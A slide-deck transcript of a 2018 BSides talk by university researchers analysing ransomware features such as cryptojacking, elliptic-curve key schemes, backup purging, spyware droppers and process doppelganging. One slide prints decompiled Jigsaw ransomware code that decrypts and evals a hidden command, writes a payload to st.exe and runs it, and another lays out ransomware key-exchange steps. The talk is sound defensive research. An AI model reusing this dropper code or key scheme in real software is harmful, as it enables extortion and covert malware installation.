$30 off During Our Annual Pro Sale. View Details »

BSides - Hipster Ransomware

BSides - Hipster Ransomware

https://www.amirootyet.com/

Modern ransomware present multi-faceted threats that present challenges beyond data loss. These ransomware include routines that drop trojans and cryptocurrency mining plugs. Some include state of the art elliptic curve cryptography, advanced key management models, new infection vectors, purging backups and more. In this talk, we discuss the future of the most potent cryptoviral extortions as predicted via empirical analysis of real-world ransomware samples that are defying general trends and differentiating themselves from their peers. All arguments will be backed by empirical evidence in form of code snippets, system snapshots, and network packet dumps as collected from real world ransomware.

Pranshu Bajpai

August 07, 2018
Tweet

More Decks by Pranshu Bajpai

Other Decks in Technology

Transcript

  1. Hipster Ransomware: Beyond Mere Encryption Pranshu Bajpai August 7, 2018

    Bsides Chicago 2018
  2. Agenda 1. Introduction 2. Hipster Ransomware 3. Attributes Cryptojacking: Best

    of Both Worlds ECDH: Judging a Book by its Cover Purge Backups: The Whole Nine Yards Dropping Spyware: Adding Insult to Injury Stealing Social Engineering’s Thunder Killswitches: Blessing in Disguise Process Doppelganging: Hiding in Plain Sight 4. Conclusion 1
  3. Introduction 2

  4. About us Pranshu Bajpai PhD Candidate, Computer Science and Engineering,

    Michigan State University http://cse.msu.edu/~bajpaipr/ https://www.linkedin.com/in/pranshubajpai/ https://twitter.com/amirootyet Richard Enbody Associate Professor, Computer Science and Engineering, Michigan State University http://www.cse.msu.edu/~enbody/ 3
  5. Related work • Young and Yung first formally introduced the

    concept of cryptoviral extortions (modern ransomware) in 1996 • Young discusses ransomware and Microsoft’s CryptoAPI in 2006 • Kharraz et al. discover in 2015 that only 6% of 1, 359 of analyzed samples were actually effective 4
  6. The primary elements of a ransomware • Infiltrate • Acquire

    encryption secret (key) • Encrypt • Demand ransom 5
  7. Common hybrid cryptosystem in ransomware • Ransomware compromises host •

    Generates symmetric encryption key • Encrypts symmetric key with a hard-coded asymmetric key • Provides attacker a copy of encrypted symmetric key • Encrypts user data using the symmetric key • Destroys symmetric key on host • Displays ransom note 6
  8. Hipster Ransomware 7

  9. Hipster Ransomware: Contemporary Subculture Hipster Ransomware Ransomware variants with innovative

    features that offer competitive, strategic or operational advantage(s) to the ransomware developer Why? • Underground market can be competitive • Need for continuous innovation • Throw off malware analysts, even if briefly 8
  10. Attributes 9

  11. Attributes Cryptojacking: Best of Both Worlds 10

  12. Cryptojacking: Best of Both Worlds • Cryptojacking is on the

    rise • Bundle a mining routine with the ransomware Why? • Runs in the background, creates no “noise” • Especially favorable to ransomware developers in context of underdeveloped countries • At least some funds generated even when ransom is not paid • Cryptocurrencies such as Monero make it feasible to mine on an average processor 11
  13. Attributes ECDH: Judging a Book by its Cover 12

  14. ECDH: Judging a Book by its Cover (Image source: quora.com)

    About ECDH • Elliptic curves: y2 = x3 + ax + b • Elliptic-curve Diffie-Hellman • Generate shared secret over insecure channels • Use derived key symmetric to encrypt data Draw a line from a to b, and then continue the line. You intersect only one other point on the elliptic curve. Ransomware use Elliptic Curve Integrated Encryption Scheme or ECIES 13
  15. ECDH: Judging a Book by its Cover Consider scp192k1 deployed

    in Petya: Domain parameters over Finite field, F: (p, a, b, G, n, h) • Finite Field, p = 2192 − 232 − 212 − 28 − 27 − 26 − 23 − 21 • Curve: y2 = x3 + ax + b over F • Base point, G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D • Order of G, n = FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D • Cofactor, h = 01 Domain parameters are public! 14
  16. ECDH: Judging a Book by its Cover Encryption steps taken

    by a ransomware to implement ECIES: • Domain parameters and a public key, P, ships hard-coded with the binary • Secret integar, s, is kept safe with the attacker 15
  17. ECDH: Judging a Book by its Cover Upon infection •

    Generate random integar, t, using /dev/urandom or CryptGenRandom • Q = [t]G • h = H([t]P) ← encryption key! • Encrypt using h • Purge t and h from host Upon receiving payment • Demand Q from host • [s]Q = [t]P ← This important property allows deriving the same point as used on host • h = H([s]Q) • Attacker sends back h to victim 16
  18. ECDH: Judging a Book by its Cover Advantages for the

    attacker • Better for marketing • ECDH not as closely scrutinized as the popular RSA • Does not depend on resident CryptoAPIs to generate symmetric key 17
  19. ECDH: Judging a Book by its Cover Advantages for the

    attacker • Better for marketing • ECDH not as closely scrutinized as the popular RSA • Does not depend on resident CryptoAPIs to generate symmetric key • Offers the same security as RSA for a smaller key-size 17
  20. Attributes Purge Backups: The Whole Nine Yards 18

  21. Purge Backups: The Whole Nine Yards Backups on host •

    Available as a mapped drive on the network AND/OR • Windows default Shadow Volume snapshots of C: drive used by ‘System Restore’ AND/OR • Synced to the cloud using a client Ransomware • explicitly hunt for and encrypt network shares • purge VSS files on host • abuse sync clients of cloud services to encrypt files stored in cloud 19
  22. Purge Backups: The Whole Nine Yards 20

  23. Purge Backups: The Whole Nine Yards 21

  24. Purge Backups: The Whole Nine Yards WNetAddConnection2W used to map

    network shares 22
  25. Attributes Dropping Spyware: Adding Insult to Injury 23

  26. Dropping Spyware: Adding Insult to Injury • Drop other malware

    such as trojans to spy on users • Attack on data availability and confidentiality • Not good for reputation hence not a common practice yet 24
  27. Dropping Spyware: Adding Insult to Injury • Drop other malware

    such as trojans to spy on users • Attack on data availability and confidentiality • Not good for reputation hence not a common practice yet • No indication that spyware is removed after payment 24
  28. Dropping Spyware: Adding Insult to Injury 1 f u n

    c t i o n NWvQtGjjfQX ( ) { 2 var data pn = " TVrDiQNMSFE (...) QQURE" ; 3 4 var cmd = "U2FsdGVkX1/LHQl+aIAo/ hXHDEI5YmZZtBIcL ..." ; 5 var dec cmd = CryptoJS . AES . decrypt (cmd , key cmd ) ; 6 dec cmd = CryptoJS . enc . Utf8 . s t r i n g i f y ( dec cmd ) ; 7 e v a l ( dec cmd ) ; 8 return 0; 9 } 10 11 . . . // decrypts to the following code // ... 12 var f l o = new ActiveXObject ( "ADODB.Stream" ) ; 13 var runer = WScript . CreateObject ( "WScript.Shell" ) ; 14 var wher = runer . S p e c i a l F o l d e r s ( " MyDocuments " ) ; 15 wher = wher + "\\" + "st.exe" ; 16 f l o . CharSet = "437" ; 17 f l o . Open () ; 18 var pny = data pn . r e p l a c e (/NMSIOP/g , "A" ) ; 19 var pny ar = CryptoJS . enc . Base64 . parse ( pny ) ; 20 var pny dec = pny ar . t o S t r i n g ( CryptoJS . enc . Utf8 ) ; 21 f l o . P o s i t i o n = 0 ; 22 f l o . SetEOS ; 23 f l o . WriteText ( pny dec ) ; 24 f l o . SaveToFile ( wher , 2) ; 25 f l o . Close ; 26 wher = "\"" + wher + "\"" ; 27 runer . Run( wher ) ; Key and IV embedded in the Jigsaw ransomware 25
  29. Dropping Spyware: Adding Insult to Injury Trojan dropper observed in

    RAA ransomware 26
  30. Attributes Stealing Social Engineering’s Thunder 27

  31. Stealing Social Engineering’s Thunder • Phishing has been the predominant

    attack vector among malware • Relies on exploiting human gullibility • Attackers are moving on to more efficient attack vectors • WannaCry exploits EternalBlue • SamSam exploits weak RDP protection 28
  32. Stealing Social Engineering’s Thunder WannaCry begins scanning port 445 to

    exploit EternalBlue 29
  33. Attributes Killswitches: Blessing in Disguise 30

  34. Blessing in Disguise Killswitch A control that effectively neutralizes the

    ransomware such that it never executes its encryption routine. • Gained widespread attention with WannaCry • Allows ransomware operators some form of control over the campaign(?) • Can be exploited by security researchers if outside the attacker’s control • NotPetya checks for perfc file in C:\Windows\... ← not really a killswitch • Will we observe more ransomware killswitches in future? 31
  35. Attributes Process Doppelganging: Hiding in Plain Sight 32

  36. Process Doppelganging: Hiding in Plain Sight SynAck Ransomware • First

    ransomware discovered to use process doppelganging • Uses the technique to evade detection by antivirus solutions • Avoids making unexpected changes to the filesystem • Doesn’t execute if run from unexpected locations • Doesn’t execute if keyboard setting on host is ’Cyrillic’ • Primary attack vector is RDP 33
  37. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34
  38. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34
  39. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable • Rollback to original Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34
  40. Process Doppelganging: Hiding in Plain Sight Process Doppelganging • First

    discussed in Black Hat Europe, December 2017 by enSilo team • Overwrite an executable with malicious code • Load malicious executable • Rollback to original • Execute malicious code Ransomware executes in context of legitimate process =⇒ AV will not detect malicious code! 34
  41. Conclusion 35

  42. Conclusion • Ransomware innovate and evolve—just like any other products

    • What is hipster today might become a trend tomorrow • Early anticipation of future malware trends help create better responses • 36
  43. Questions • BSides Chicago organizers • For the support! •

    Michigan State infosec team • For continuous help and support! Questions @amirootyet 37